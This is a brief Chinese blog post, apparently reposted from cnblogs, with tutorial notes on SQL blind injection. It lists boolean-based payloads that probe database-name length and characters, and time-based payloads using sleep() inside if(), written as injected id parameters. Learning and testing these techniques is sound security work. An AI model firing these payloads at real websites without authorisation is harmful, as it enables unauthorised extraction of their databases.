码迷,mamicode.com
首页 > 数据库 > 详细

sql盲注

时间:2019-11-09 11:56:43      阅读:103      评论:0      收藏:0      [点我收藏+]

标签:调整   字符串长度   bst   --   sql盲注   破解   注入   数据   style   

1、sql盲注漏洞:

1、通过真假来判断。调整and后面的数据真假来对比

2、length(str)获取字符串长度   id=1‘ and  length(database())=8--+

3、猜解字符串 ascii(‘test‘)        id=1‘ and ascii(substr(database(),1,1))>64    破解字符串

2、延时注入:

1、if (length(database())>4,5,0)

2、sleep(if (length(database())>4,5,0))

eg:id=1‘ and  sleep(if(length(database())>10,5,0))

3、id=1‘ and if(ascii(substr(database(),1,1))>114, 0, sleep(5))

sql盲注

标签:调整   字符串长度   bst   --   sql盲注   破解   注入   数据   style   

原文地址:https://www.cnblogs.com/lzhibk/p/11824563.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!